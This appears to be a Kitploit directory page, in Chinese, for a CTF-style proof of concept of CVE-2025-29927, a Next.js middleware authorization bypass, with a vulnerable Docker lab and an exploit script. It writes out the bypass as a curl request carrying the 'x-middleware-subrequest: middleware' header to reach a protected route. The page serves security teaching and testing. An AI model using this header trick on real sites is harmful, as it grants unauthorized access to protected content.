Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-29927 — CTF风格的概念验证,演示CVE-2025-29927 Next.js中间件授权绕过。包含易受攻击的Docker应用和利用脚本,用于从受保护路由获取flag。 | Kitploit
工具/GitHubGitHub/mhamzakhattak/cve-2025-29927
漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育
GitHubmhamzakhattak/cve-2025-29927

CVE-2025-29927

CTF风格的概念验证,演示CVE-2025-29927 Next.js中间件授权绕过。包含易受攻击的Docker应用和利用脚本,用于从受保护路由获取flag。

查看仓库
111年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-29927 - Next.js 中间件授权绕过 (PoC)

这是一个基于 夺旗(CTF) 风格的漏洞概念验证,适用于 Next.js 中间件授权绕过 漏洞(CVE-2025-29927)。目标是通过绕过认证中间件,从 /protected 路由获取旗标。


漏洞概要

  • CVE: CVE-2025-29927
  • 类型: 授权绕过
  • 组件: Next.js 中间件
  • 影响: 未授权访问受保护的路由
  • PoC 目标路由: /protected
  • 预期行为: 未授权用户被重定向到 /
  • 漏洞行为: 使用精心构造的请求可以绕过重定向,直接访问受保护内容

PoC 环境搭建

1. 克隆仓库

root@kitploit:~
git clone https://github.com/mhamzakhattak/CVE-2025-29927
cd CVE-2025-29927
cd nextjs-docker

2. 构建并运行存在漏洞的应用

root@kitploit:~
sudo docker build -t nextjs-auth-app .
sudo docker run -p 3000:3000 nextjs-auth-app

这会在 http://IP:3000 上启动存在漏洞的 Next.js 应用。


漏洞利用

1. 未利用漏洞时

尝试访问:

root@kitploit:~
curl -i http://IP:3000/protected

你会被重定向到 /。

root@kitploit:~
 curl -H "x-middleware-subrequest: middleware" http://IP:3000/protected

2. 利用漏洞

使用提供的 exploit.py 绕过中间件并访问受保护路由:

root@kitploit:~
python3 exploit.py -url http://IP:3000

如果成功,你将从中获取旗标 /protected。


文件

  • Dockerfile - 构建存在漏洞的 Next.js 应用
  • exploit.py - 利用漏洞绕过认证
  • pages/ - 包含存在漏洞的 /protected 和 /login 路由
  • middleware.js - 存在漏洞的中间件逻辑
  • README.md - 本文件

免责声明

此 PoC 仅用于教育及研究目的。请勿将其用于你不拥有或未经明确许可测试的系统。


🏁 旗标

通过利用漏洞访问以下地址来寻找旗标:

root@kitploit:~
http://IP:3000/protected

祝你好运!🏴‍☠️

下载工具